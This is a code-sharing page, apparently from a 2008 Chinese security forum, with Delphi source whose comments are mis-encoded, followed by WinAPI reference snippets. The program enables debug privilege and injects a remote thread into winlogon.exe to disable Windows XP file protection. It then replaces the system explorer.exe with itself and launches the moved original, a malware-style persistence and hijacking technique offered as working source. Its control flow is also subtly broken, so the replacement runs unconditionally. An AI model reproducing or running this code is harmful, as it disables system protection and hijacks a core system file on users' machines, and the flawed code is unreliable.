?? 復(fù)件 關(guān)閉xp保護(hù)替換explorer.txt
字號:
{*******************************************************}
{ }
{ 關(guān)閉XP保護(hù)。替換explorer.exe }
{ }
{ 版權(quán)所有 (C) 2008 bbs.secdst.net }
{ }
{*******************************************************}
program Project1;
uses
Windows,TlHelp32;
function LowerCase(const S: string): string; //轉(zhuǎn)小寫
var
Ch: Char;
L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <> 0 do
begin
Ch := Source^;
if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);//Inc(i,j);=>i:=i+j;//Inc(i);=>i:=i+1;
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, MutexName);
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
//CloseHandle(MutexHandle);
Result := False;
Exit;
end;
end;
Result := True;
end;
function GetWinPath: string; //取WINDOWS目錄
var
Buf: array[0..MAX_PATH] of char;
begin
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function GetTempDirectory: string; //取臨時目錄
var
Buf: array[0..MAX_PATH] of char;
begin
GetTempPath(MAX_PATH,Buf);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function EnableDebugPriv : Boolean; //提權(quán)為DEBUG
var
hToken : THANDLE;
tp : TTokenPrivileges;
rl : Cardinal;
begin
result := false;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;
procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 關(guān)閉XP文件保護(hù)
var
TID: LongWord;
hSfc,hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary('sfc_os.dll');
pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string); //查找winlogon.exe進(jìn)程PID
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
const ExpFile = 'explorer.exe';
MasterMutex = 'OpenSoul';
var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆體
if not EnableDebugPriv then Exit; //提權(quán)失敗退出
InitProcess('winlogon.exe') ; //注入winlogon.exe 先關(guān)閉xp的文件保護(hù) .預(yù)防系統(tǒng)的還原
s := ParamStr(0) ; //取當(dāng)前程序的完整路徑+名字
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判斷自己是不是系統(tǒng)下的explorer.exe
showmessage('目前的explorer.exe不是自己');
begin //如果不是
MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先移動正在運(yùn)行的explorer.exe
CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //把自己復(fù)制到windows目錄 為explorer.exe
end;
WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //運(yùn)行真正的explorer.exe
end.
WinAPI: GetWindowsDirectory - 獲取 Windows 所在目錄
//聲明:
GetWindowsDirectory(
lpBuffer: PChar; {緩沖區(qū)}
uSize: UINT {緩沖區(qū)大小}
): UINT; {返回實際長度}
--------------------------------------------------------------------------------
//舉例:
var
arr: array[0..MAX_PATH] of Char;
num: UINT;
begin
num := GetWindowsDirectory(arr, MAX_PATH);
ShowMessage(arr); {C:\WINDOWS}
ShowMessage(IntToStr(num)); {10}
end;
WinAPI: GetTempPath - 獲取臨時文件夾路徑
//聲明:
GetTempPath(
nBufferLength: DWORD; {緩沖區(qū)大小}
lpBuffer: PChar {緩沖區(qū)}
): DWORD; {返回實際長度}
--------------------------------------------------------------------------------
//舉例:
var
arr: array[0..MAX_PATH] of Char;
num: DWORD;
begin
num := GetTempPath(MAX_PATH, arr);
ShowMessage(arr); {C:\DOCUME~1\wy\LOCALS~1\Temp\}
ShowMessage(IntToStr(num)); {29}
end;
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -